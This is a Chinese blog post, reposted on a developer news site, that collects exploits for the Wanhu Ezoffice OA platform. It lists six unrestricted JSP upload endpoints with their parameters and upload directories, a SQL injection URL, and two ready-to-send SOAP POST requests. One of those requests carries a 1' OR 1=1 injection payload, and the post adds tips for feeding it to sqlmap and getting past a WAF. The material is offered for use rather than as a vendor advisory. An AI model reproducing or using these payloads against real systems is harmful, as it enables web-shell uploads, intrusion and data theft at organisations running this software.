万户Ezoffice 漏洞集合+0day

栏目: JSP · 发布时间: 3年前

来源: www.sh0w.top

内容简介:万户Ezoffice 漏洞集合+0day

本文转载自:http://www.sh0w.top/index.php/archives/33/?utm_source=tuicool&utm_medium=referral,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有。

老版本任意文件上传、Web Service SQLi、New Web Serivce SQLi

一、老版本的用户已经不多了

1、第一处上传点

/defaultroot/govezoffice/gov_documentmanager/senddocument_import.jsp

构造参数上传,构造fileType=jsp来完成上传。

利用第一处上传的表单,直接上传jsp文件;直接返回文件名,如图:(查看源代码)

文件在upload参数设置的“archives”: /defaultroot/upload/archives/

2、第二处上传点

/defaultroot/customize/formClassUpload.jsp

没有任何限制直接上传,上传后的文件名是原文件名。

存在 defaultroot/devform/customize/ 目录下 查看源代码看文件名

3、第三处上传点(鸡肋)

/defaultroot/public/jsp/smartUploadPic.jsp

利用第三处的构造参数截断URL和上传的文件名#需 服务器 支持URL允许存在空字节!文件上传存在 /defaultroot/upload/archives/

4、第四处上传点

/defaultroot/work_flow/jsFileUpload.jsp

后门!简直就是后门,只能上传jsp文件!∑(O_O;)

文件上传在: /defaultroot/devform/workflow/ 原上传文件名。

5、第五处上传点

/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0

文件位置 /defaultroot/upload/information/

6、第六处上传点

/defaultroot/public/jsp/multiuploadfile.jsp?path=sound&mode=add&fileName=fileName&saveName=soundSaveName&tableName=soundTableName&fileMaxSize=0&photos=null

文件位置: /defaultroot/upload/sound/

二、SQLi

/defaultroot/public/select_user/search_org_list.jsp?searchName=

三、老版本Web Service SQLi

/defaultroot/xfservices/DealFileWebService

POST包:

POST /defaultroot/xfservices/DealFileWebService HTTP/1.1
    Host: www.*..cn:7890
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: LocLan=zh_CN
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 567

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://com.whir.mobile/DealFileWebService">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:getUserByAccount>           <urn:userAccount>1</urn:userAccount>        </urn:getUserByAccount>     </SOAP-ENV:Body></SOAP-ENV:Envelope>

四、New Web Service SQLi

老版本看到Web Service存在SQL注入后,想着去看看最新的版本。但是访问 xfservices 直接跳转首页,找不到Web Serivce了。

就去找了一下开发手册看看,你猜怎么着~๑乛◡乛๑

在Web Service Editor手工测试的时候,测试出来了存在SQL注入。

后来在抓包的时候遇到了坑,无法通过浏览器和burp直接抓包。(╯—﹏—)╯(┷━━━┷ 无法抓包,怎么愉快的丢SQLmap?

就去看了看漏洞库关于web service的注入漏洞,看到了几个例子需要中转脚本?(⊙⊙?)

怎么办,我不会写中转脚本。(╥╯^╰╥)

然后通过AWVS的HTTP Editor功能才知道,原来是有Referfer验证。所以加入Referfer就可以抓POST包丢SQLMAP了~

之前wooyun的需要中转脚本的Web Service 注入同理。

so

POST包:

POST /defaultroot/services/ExchangeService HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 788
X-Requested-With: XMLHttpRequest
Referer: http://oa.*.*.cn:7001/defaultroot/services/ExchangeService?wsdl
Host: oa.*.*.cn:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://61.187.198.50:82/defaultroot/services/ExchangeService" xmlns:urn1="http://po.exchange.govezoffice.whir.com" xmlns:urn3="http://xml.apache.org/xml-soap">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <getExchangeUnitsByParameterAll>
         <unitLevel>1</unitLevel>
         <unitAccount>1' OR 1=1 -- </unitAccount>
         <orderBy>1</orderBy>
        </getExchangeUnitsByParameterAll>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

结果你猜怎么着,出来的是延时注入,surprise!!!还无视waf....嗷呜~ヾ(*´∇`)ノ

万户Ezoffice 漏洞集合+0day


以上所述就是小编给大家介绍的《万户Ezoffice 漏洞集合+0day》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

关注码农网公众号

关注我们,获取更多IT资讯^_^


为你推荐:

相关软件推荐:

查看所有标签

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Web应用漏洞侦测与防御

Web应用漏洞侦测与防御

Mike Shema / 齐宁、庞建民、张铮、单征 / 机械工业出版社 / 2014-8-20 / 69.00

本书由国际知名网络安全专家亲笔撰写,全面讲解如何预防常见的网络攻击,包括HTML注入及跨站脚本攻击、跨站请求伪造攻击、SQL注入攻击及数据存储操纵、攻破身份认证模式、利用设计缺陷、利用平台弱点、攻击浏览器和隐私等, 全书共8章:第1章介绍HTML5的新增特性及使用和滥用HTML5的安全考虑;第2章展示了如何只通过浏览器和最基本的HTML知识就可以利用Web中最常见的漏洞;第3章详细讲解CSR......一起来看看 《Web应用漏洞侦测与防御》 这本书的介绍吧!

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具